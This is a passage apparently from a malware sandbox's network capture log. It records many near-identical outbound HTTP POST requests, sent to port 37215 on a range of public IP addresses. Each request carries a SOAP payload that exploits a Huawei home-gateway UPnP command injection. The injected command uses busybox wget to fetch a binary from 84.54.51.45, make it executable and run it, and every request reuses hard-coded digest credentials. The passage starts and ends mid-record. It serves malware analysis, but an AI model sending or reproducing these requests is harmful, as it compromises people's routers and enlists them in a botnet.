                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            181192.168.2.1535164197.224.220.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177172899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            182192.168.2.1557268197.84.209.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177185059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            183192.168.2.1543266197.186.72.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177207947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            184192.168.2.1548044197.157.236.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177237034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            185192.168.2.1557362197.39.147.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177292109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            186192.168.2.1555310197.194.244.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177321911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            187192.168.2.1548960197.41.202.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177329063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            188192.168.2.1532776197.149.60.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177340984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            189192.168.2.1555052197.189.64.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177371025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            190192.168.2.1560740197.2.50.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.177419901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
